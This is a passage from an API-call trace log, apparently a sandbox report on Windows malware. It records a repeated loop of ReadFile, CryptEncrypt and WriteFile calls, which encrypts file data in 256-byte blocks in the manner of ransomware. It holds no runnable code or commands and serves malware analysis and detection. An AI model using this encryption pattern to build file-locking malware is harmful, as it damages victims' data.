lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.246] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.246] GetLastError () returned 0x0 [0149.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.246] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.246] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.246] GetLastError () returned 0x0 [0149.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.247] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.247] GetLastError () returned 0x0 [0149.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.247] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.247] GetLastError () returned 0x0 [0149.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.247] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.247] GetLastError () returned 0x0 [0149.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.247] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.247] GetLastError () returned 0x0 [0149.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.247] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.247] GetLastError () returned 0x0 [0149.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.247] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.247] GetLastError () returned 0x0 [0149.247] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.248] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.248] GetLastError () returned 0x0 [0149.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.248] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.248] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.248] GetLastError () returned 0x0 [0149.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.248] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.248] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.248] GetLastError () returned 0x0 [0149.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.248] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.248] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.248] GetLastError () returned 0x0 [0149.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.248] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.248] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.248] GetLastError () returned 0x0 [0149.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.248] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.248] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.248] GetLastError () returned 0x0 [0149.248] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.248] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.248] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.248] GetLastError () returned 0x0 [0149.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.249] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.249] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.249] GetLastError () returned 0x0 [0149.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.249] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.249] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.249] GetLastError () returned 0x0 [0149.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.249] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.249] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.249] GetLastError () returned 0x0 [0149.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.249] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.249] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.249] GetLastError () returned 0x0 [0149.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.249] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.249] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.249] GetLastError () returned 0x0 [0149.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.249] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.249] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.249] GetLastError () returned 0x0 [0149.249] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.250] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.250] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.250] GetLastError () returned 0x0 [0149.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.250] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.250] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.250] GetLastError () returned 0x0 [0149.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.250] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.250] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.250] GetLastError () returned 0x0 [0149.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.250] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.250] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.250] GetLastError () returned 0x0 [0149.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.250] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.250] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.250] GetLastError () returned 0x0 [0149.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.250] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.250] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.250] GetLastError () returned 0x0 [0149.250] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.250] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.251] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.251] GetLastError () returned 0x0 [0149.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.251] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.251] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.251] GetLastError () returned 0x0 [0149.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.251] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.251] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.251] GetLastError () returned 0x0 [0149.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.251] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.251] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.251] GetLastError () returned 0x0 [0149.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.251] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.251] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.251] GetLastError () returned 0x0 [0149.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.251] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.251] 